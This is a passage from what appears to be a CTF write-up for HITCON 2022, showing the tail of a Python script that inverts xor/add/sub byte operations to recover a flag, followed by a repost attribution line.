        f[i]=(c[i]^xor_data[i])-add_data[i]+0x100&0xff  # gadget used add: subtract the constant
    elif op[i]==2:
        f[i]=add_data[i]-(c[i]^xor_data[i])+0x100&0xff  # gadget used sub: subtract from the constant
    else:
        # Unreachable in practice: get_op() only returns 1 or 2 (otherwise it exits).
        print(i,op[i])
        exit()
print(bytes(f))

原文始发于微信公众号(ChaMd5安全团队):2022HITCON WriteUp by Mini-Venom(招新)
